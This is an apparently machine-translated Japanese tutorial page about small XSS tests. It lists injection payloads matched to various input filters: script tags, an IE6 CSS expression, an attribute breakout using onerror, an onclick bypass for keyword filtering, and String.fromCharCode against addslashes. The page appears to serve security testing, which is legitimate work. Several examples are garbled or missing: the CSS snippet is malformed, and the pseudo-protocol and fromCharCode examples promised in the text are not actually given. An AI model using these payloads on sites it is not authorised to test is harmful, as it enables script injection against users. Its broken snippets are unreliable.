ホームページ > 運用・保守 > 安全性 > xss の小規模テストはどのように行われますか?

xss の小規模テストはどのように行われますか?

WBOY
リリース: 2023-05-19 11:37:06
転載
1010 人が閲覧しました
  • #セキュリティ制限なし、直接使用

##<script>alert(/xss/);</script>

  • 制限: CSS のみを使用でき、HTML タグは許可されません

式を使用して XSS を構築できることはわかっていますが、テストできるのは IE でのみです。 , IE6で以下のテストを行ってください。

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}
ログイン後にコピー
  • 制限事項: HTML はエスケープされ、Image タグは使用可能です

テストに入力された文字は src アドレスに挿入されるため、擬似プロトコルを使用してそれを回避できます。

直接入力

alert( /xss/);
ログイン後にコピー
または、イベントを使用して回避することもできます。次のように、最後のステートメントに注意してください:

1" onerror=alert(/xss/) ; var a="1

  • 制約条件:キーワードフィルタリングを使用します。

テストしましたが、ほとんどがフィルタリングされましたが、一部はフィルタリングされませんでした。script/onerror をテストした後、フィルタリングされましたが、onclick はフィルタリングされませんでした。onclick イベントを使用してバイパスしてください

<img src=# onclick=alert(/xss/);>
ログイン後にコピー
  • 制限: 特徴的な文字をエスケープするには、アッドスラッシュを使用してください

つまり、一重引用符、二重引用符などは、 XSS ステートメント、特徴的な文字。

<script>alert(/xss/);</script>
ログイン後にコピー
を直接使用して

をバイパスするか、次のように String.fromCharCode メソッドを使用します。

以上がxss の小規模テストはどのように行われますか?の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
xss
ソース:yisu.com
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート